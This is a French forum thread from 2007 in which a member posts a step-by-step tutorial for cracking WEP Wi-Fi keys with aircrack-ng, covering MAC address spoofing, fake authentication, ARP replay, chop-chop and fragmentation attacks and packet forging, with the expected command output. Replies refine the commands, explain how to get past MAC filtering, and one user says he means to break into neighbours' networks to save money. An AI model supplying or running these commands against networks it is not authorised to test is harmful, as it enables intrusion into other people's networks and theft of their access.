[TUTO] Cracker un réseau plus rapidement (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-08-2007 19:37:35

xhark
Membre
Inscription : 12-10-2006
Messages : 30

[TUTO] Cracker un réseau plus rapidement

Sur linux il est utile de se servir de certaines fonctions natives.

Bien souvent il faut s'y prendre à plusieurs reprises (signal pas assez fort, parasites, plus aucun signal, etc...)

Ce que je vais vous donneer ci-dessous vous permettra de faire un copier-coller assez rapide et ce, peu importe les adresses mac des stations/APs.

Relevez les adresses MAC (medium access control) de votre borne wifi (AP), d'une station dont vous souhaitez spoofer l'adresse MAC ainsi que le nom du réseau "ESSID".
Entrez en ligne de commande sous le shell :

export AP=01:23:34:56:78:9A;
export ESSID=MonWifi;
export STATION=00:11:22:33:44:55;

==> remplacez les valeurs par les votres, sans guillemet

A noter que vous pouvez mettre ça dans un fichier texte, le copier puis cliquer sur la molette de la souris pour l'exécuter directement une fois sous le shell.

Pour la suite il suffit donc de vous faire également un fichier texte contenant toutes les commandes à entrer, maintenant que l'on a établit diverses variables.

Si vous enregistrez le tout sur une partition, entrez le chemin d'accès, voici par exemple le mien :

cd /mnt/hdb1/liste-wifi/

Puis viennent toutes les commandes originales du tuto.

Initialisation de la carte (attention cela diffère suivant le chipset, la mienne étant une athéros WG511T de NETGEAR; ath0,1,2... peut également varier) :

airmon-ng stop ath0;
airmon-ng start wifi0;
airodump-ng --write tutonew ath0;

Lancement d'aireplay :

aireplay-ng -1 0 -e $ESSID -a $AP -h $STATION ath0
aireplay-ng -3 -e $ESSID -b $AP -h $STATION ath0

(Aireplay doit ensuite comment à capturer les IVs)



Si vous souhaitez faire une attaque chop-chop, voici les lignes à entrer :

aireplay-ng -1 30 -e $ESSID -a $AP -b $AP -h $STATION ath0

Vous devriez obtenir si cela fonctionne :

18:18:05  Sending Authentication Request
18:18:05  Authentication successful
18:18:05  Sending Association Request
18:18:09  Association successful :-)
18:18:24  Sending keep-alive packet

Entrez ensuite :

aireplay-ng -4 -b $AP -h $STATION ath0

(si vous souhaitez faire une attaque par fragmentation :aireplay-ng  -5 -b $AP -h $STATION ath0)

Vous obtenez :

Use this packet ? y
Saving chosen packet in replay_src-0623-181939.cap

Saving plaintext in replay_dec-0623-192346.cap
Saving keystream in replay_dec-0623-192346.xor

puis :

tcpdump -s 0 -n -e -r replay_dec-0623-192346.cap

puis :

packetforge-ng -0 -a $AP -h $STATION -k 192.168.2.100 -l 192.168.2.1 -y replay_dec-0623-192346.xor -w injection

==> les IP peuvent changer suivant  le réseau wifi

puis :

aireplay-ng -3 -e $ESSID -a $AP -b $AP -h $STATION -r injection -x 500 ath0

Les arp devraient augmenter ainsi que les IVs aussi sur airodump

Liens :
http://forum.tuto-fr.com/viewtopic.php?id=1699 (info sur chopchop)
http://www.aircrack-ng.org/doku.php?id=korek_chopchop (info sur chopchop)
(j'envoi à billy un autre fichier qu'il joindra au forum)
http://ethneo.free.fr/casser_cle_wep.php (diverses info, dsl pr la concurrence smile )

Dernière modification par xhark (05-09-2007 16:09:25)


Geek cool  ? Consultez mon blog wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-08-2007 08:59:46

beepbeep38
Membre
Inscription : 24-01-2007
Messages : 6

Re : [TUTO] Cracker un réseau plus rapidement

Salut
Merci beaucoup pour l'export... On peut même pousser le vice en cumulant les lignes avec && entres. Par exemple le mode monitor pour une ath:
airmon-ng stop ath0 && airmon-ng start wifi0 Cela détruit la carte ath0 puis la re-créer ensuite avec le mode monitor
export AP=01:23:34:56:78:9A && export ESSID=MonWifi && export STATION=00:11:22:33:44:55 && export CH=11

Mais pour que mes variables soit utilisables dans toutes mes fenêtres de terminaux , j'ai du les déclarer dans toutes...

Hors Ligne

#3 28-08-2007 11:14:15

vantek
Membre
Inscription : 05-01-2006
Messages : 158

Re : [TUTO] Cracker un réseau plus rapidement

beepbeep38 a écrit :

Mais pour que mes variables soit utilisables dans toutes mes fenêtres de terminaux , j'ai du les déclarer dans toutes...

j'ai pas fait de tests, mais sa raccourci pas la chose =/

Hors Ligne

#4 28-08-2007 13:01:47

xhark
Membre
Inscription : 12-10-2006
Messages : 30

Re : [TUTO] Cracker un réseau plus rapidement

beepbeep38 a écrit :

Salut
Mais pour que mes variables soit utilisables dans toutes mes fenêtres de terminaux , j'ai du les déclarer dans toutes...

Non justement avec le click droit sous BackTrack2 tu as une commande du genre "Send command to all terminal", il faut pour cela avoir ouvert plusieurs onglets dans la meme fenetre du terminal wink


Geek cool  ? Consultez mon blog wink

Hors Ligne

#5 28-08-2007 13:17:54

[email protected]
Membre
Inscription : 27-08-2007
Messages : 9

Re : [TUTO] Cracker un réseau plus rapidement

Super ton TUTO !! winklol

Très clair et détaillé ......
D'une façon bizarre hmm je n'ai pas utiliser les variables hmm  (zut c'était pourtant la principale originalité du Tuto roll)
Mais grâce à toi, j'ai pu comprendre l'attaque chop-chop ! Il me manquait des paramètres et des lignes de commandes que je ne comprenait pas dans le
"paccketforge-ng" je n'avais pas le paramètre  "-0" !

Maintenant du mal avec aircrack .......... mais c'est un autre problème !

Encore félicitation pour le TUTO !

Hors Ligne

#6 28-08-2007 14:51:28

xhark
Membre
Inscription : 12-10-2006
Messages : 30

Re : [TUTO] Cracker un réseau plus rapidement

L'attaque par fragmentation peut également être une alternative, mais chopchop chez moi a fonctionné d'enfer pour recevoir les ivs en pagaille (et sans station connectée) !


Geek cool  ? Consultez mon blog wink

Hors Ligne

#7 29-08-2007 17:38:29

mik
Invité

Re : [TUTO] Cracker un réseau plus rapidement

sans station connecté  ok, mais quel mac station mets tu alors? car j'ai plein de reseau en wep mais quasi pas de station connecté.
merci

#8 29-08-2007 17:42:29

vantek
Membre
Inscription : 05-01-2006
Messages : 158

Re : [TUTO] Cracker un réseau plus rapidement

si le wifi est activé, c'est que des gens se connectent dessus...faut laisser tourner le pc qques jours, 'fin de journée aprés le boulot des gens, ou bien le week end...


mais bon, t'es pas cencé te conecter sur le wifi des voisins wink

Hors Ligne

#9 29-08-2007 17:58:07

mik
Invité

Re : [TUTO] Cracker un réseau plus rapidement

en gros j'attend que quelqu'un se connect puis je prend son adresse mac que je l'attribus a mon alfa 500mw puis ensuite je peux me lancer dans cette aventure  chopchop etc...
les fins de mois son déja dur comme cela :p

#10 29-08-2007 20:14:23

xhark
Membre
Inscription : 12-10-2006
Messages : 30

Re : [TUTO] Cracker un réseau plus rapidement

Ben tu mets une adresse MAC au hasard (11:22:33:44:55:66 convient très bien) mais le filtrage d'adresse MAC peut être activé et dans ce cas il te faut choper une adresse MAC autorisée, obligé. Ensuite peu importe si cette station est connectée ou pas puisque tu te fais passer pour elle pour générer le traffic avec l'attaque chopchop

A titre d'info avec 40 000 IVs et aircrack-ptw la clé a sauté en 1 sec big_smile


Geek cool  ? Consultez mon blog wink

Hors Ligne

#11 29-08-2007 20:53:06

Unpeudaide
Membre
Inscription : 28-08-2007
Messages : 64

Re : [TUTO] Cracker un réseau plus rapidement

Et ca marche avec Wifiway sinon?:rolleyes:

Hors Ligne

#12 30-08-2007 09:21:51

mik
Invité

Re : [TUTO] Cracker un réseau plus rapidement

pour le filtrage c'est  "aireplay-ng -1 0 -e $ESSID -a $AP -h $STATION ath0" si c'est succesfull ya pas de masque si j'ai bien compris sinon jsuis choux! si j'ai bien compris.

Xhark merci pour cette précision.

#13 30-08-2007 14:03:21

xhark
Membre
Inscription : 12-10-2006
Messages : 30

Re : [TUTO] Cracker un réseau plus rapidement

Pas de masque non, wifiway j'en sais rien je ne connais pas smile ça fonctionne avec tout ce qui tourne sous linux wink (sous windows c'est la commande SET)

Dernière modification par xhark (30-08-2007 14:03:38)


Geek cool  ? Consultez mon blog wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires